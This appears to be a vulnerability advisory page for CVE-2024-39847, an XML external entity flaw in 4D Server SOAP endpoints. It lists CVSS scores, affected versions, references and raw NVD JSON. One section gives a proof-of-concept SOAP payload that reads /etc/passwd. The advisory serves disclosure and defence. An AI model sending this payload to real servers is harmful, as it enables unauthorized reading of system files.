Security Vulnerability Report
CVE-2024-39847 CVSS 7.5 HIGH

CVE-2024-39847

Published: 2026-04-30 07:16:36
Last Modified: 2026-05-17 23:17:02
Source: 23637b5d-af4c-4cf9-b8f6-deb7fd0f8423

Description

Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:4d:server:20:r3:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:4d:server:20:r4:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:4d:server:20:r6:*:*:*:*:*:* - VULNERABLE
4D v20 < R6
4D v19 < R11
4D v18 LTS < R7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
xml
<?xml version="1.0" encoding="UTF-8"?>
<!-- PoC for CVE-2024-39847 (4D Server XXE). Target: 4D Server SOAP endpoint -->
<!DOCTYPE data [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <SomeOperation>
      <parameter>&xxe;</parameter>
    </SomeOperation>
  </soap:Body>
</soap:Envelope>

References

https://4d.com (Product)
https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/ (Exploit, Third Party Advisory)
http://seclists.org/fulldisclosure/2026/May/0

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-39847", "sourceIdentifier": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "published": "2026-04-30T07:16:36.143", "lastModified": "2026-05-17T23:17:02.123", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Unauthenticated attackers can exploit a weakness in the XML parser functionality of the SOAP endpoints in 4D server. This allows them to obtain read access to files on the application server and adjacent network shares, and perform HTTP GET requests to arbitrary services."}], "metrics": {"cvssMetricV40": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "YES", "Recovery": "NOT_DEFINED", 
"valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-611"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:4d:server:20:r3:*:*:*:*:*:*", "matchCriteriaId": "7CB9D8C6-82C3-4C82-92CC-36E27D0AEBC6"}, {"vulnerable": true, "criteria": "cpe:2.3:a:4d:server:20:r4:*:*:*:*:*:*", "matchCriteriaId": "B1C45F4F-AE28-4B0D-BCCC-648953FC9772"}, {"vulnerable": true, "criteria": "cpe:2.3:a:4d:server:20:r6:*:*:*:*:*:*", "matchCriteriaId": "5512EA72-DE0B-4A44-AD7D-F8D277541F65"}]}]}], "references": [{"url": "https://4d.com", "source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "tags": ["Product"]}, {"url": "https://www.schutzwerk.com/en/blog/schutzwerk-sa-2024-002/", "source": "23637b5d-af4c-4cf9-b8f6-deb7fd0f8423", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "http://seclists.org/fulldisclosure/2026/May/0", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}